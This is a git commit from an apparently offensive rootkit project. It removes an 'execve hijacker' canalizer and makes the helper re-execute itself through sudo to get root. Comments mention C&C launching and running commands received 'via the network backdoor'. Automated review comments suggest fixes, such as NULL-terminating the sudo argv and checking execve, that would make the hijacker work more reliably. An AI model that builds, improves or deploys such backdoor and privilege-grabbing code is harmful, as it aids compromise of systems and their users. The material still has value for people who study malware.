The execve hijacker now works without needing a canalizer, so it was removed. Also some additional tweaks to the C&C launching of the helper.

This commit is contained in:
h3xduck
2022-02-19 11:57:32 -05:00
parent 8e97624326
commit 1ec4ed8486
12 changed files with 2072 additions and 2086 deletions


@@ -3,13 +3,7 @@ HEADERS = lib/RawTCP.h
EXTRA_CFLAGS= -I$(PWD)/lib
default:
make execve_hijack execve_hijack_canalizer
execve_hijack_canalizer.o: execve_hijack_canalizer.c
gcc -c execve_hijack_canalizer.c
execve_hijack_canalizer: execve_hijack_canalizer.o
gcc -o execve_hijack_canalizer execve_hijack_canalizer.o
make execve_hijack
execve_hijack.o: execve_hijack.c $(HEADERS)
gcc -c execve_hijack.c
@@ -19,6 +13,4 @@ execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
clean:
-rm -f execve_hijack.o
-rm -f execve_hijack
-rm -f execve_hijack_canalizer.o
-rm -f execve_hijack_canalizer
-rm -f execve_hijack
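Review bot: After the canalizer lines are dropped, the `clean` recipe lists `-rm -f execve_hijack` twice (the second and last lines of the hunk); one of them should go, e.g. keep only `-rm -f execve_hijack.o` and `-rm -f execve_hijack`. The first hunk appears to leave `default:` with a different recipe than before, but the rendered view lost the +/- markers, so please confirm that `make execve_hijack` is still what `default` runs. The three "binary file" sections in this commit look like the `.o` and executable outputs that `clean` removes; if so they should be ignored by git rather than committed.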



@@ -64,8 +64,22 @@ char* getLocalIpAddress(){
return IPbuffer;
}
int main(int argc, char* argv[]){
int main(int argc, char* argv[], char *envp[]){
printf("Hello world from execve hijacker\n");
for(int ii=0; ii<argc; ii++){
printf("Argument %i is %s\n", ii, argv[ii]);
}
if(geteuid() != 0){
//We do not have privileges, but we do want them. Let's rerun the program now.
char* args[argc+1];
args[0] = "sudo";
for(int ii=0; ii<argc; ii++){
args[ii+1] = argv[ii];
}
execve("/usr/bin/sudo", args, envp);
}
time_t rawtime;
struct tm * timeinfo;
@@ -74,10 +88,6 @@ int main(int argc, char* argv[]){
timeinfo = localtime ( &rawtime );
char* timestr = asctime(timeinfo);
for(int ii=0; ii<argc; ii++){
printf("Argument %i is %s\n", ii, argv[ii]);
}
//We proceed to fork() and exec the original program, whilst also executing the one we
//ordered to execute via the network backdoor
//int bpf_map_fd = bpf_map_get_fd_by_id()
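Review bot: The argv array built for the sudo re-exec in the first hunk is never NULL-terminated: `args` has `argc+1` slots and every one of them is filled (`args[0]` plus `argv[0..argc-1]` in `args[1..argc]`), so execve() reads past the end of the array looking for the terminating NULL, which is undefined behavior. Size it `char* args[argc+2];` and set `args[argc+1] = NULL;` before the call. The execve() return value is also unchecked, so if /usr/bin/sudo is missing or the call fails the program silently continues without the privileges it just asked for; `if (execve("/usr/bin/sudo", args, envp) < 0) { perror("execve"); return 1; }` makes that failure explicit. main() continues past both hunks, and the second hunk keeps the commented-out `//int bpf_map_fd = bpf_map_get_fd_by_id()` line, which should be deleted rather than left as dead code.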




@@ -1,11 +0,0 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char* argv[], char *envp[]){
printf("Hello world from the canalizer\n");
char* args[] = {"sudo", "/home/osboxes/TFG/src/helpers/execve_hijack", NULL};
execve("/usr/bin/sudo", args, envp);
return 0;
}